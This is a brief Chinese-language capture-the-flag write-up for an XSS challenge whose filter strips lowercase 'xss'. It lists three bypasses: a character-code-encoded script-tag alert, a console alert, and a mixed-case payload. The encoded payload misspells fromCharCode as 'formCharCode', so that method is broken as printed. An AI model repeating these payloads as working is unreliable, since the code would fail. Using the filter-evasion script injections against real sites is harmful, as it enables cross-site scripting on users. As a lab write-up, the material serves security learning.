首先看一下题目,题目说alert出xss三个字母,才会有flag
输入 xss123输出123,说明小写xss被过滤了
绕过方法一
编码绕过
<script>alert(String.formCharCode(120,115,115))</script>
还可以把<script>alert("xss")</script> hex编码绕过
绕过方法二
按f12打开调试器,在console中输入alert('xss')即可
绕过方法三
利用大小写绕过
<script>alert("xSS")</script>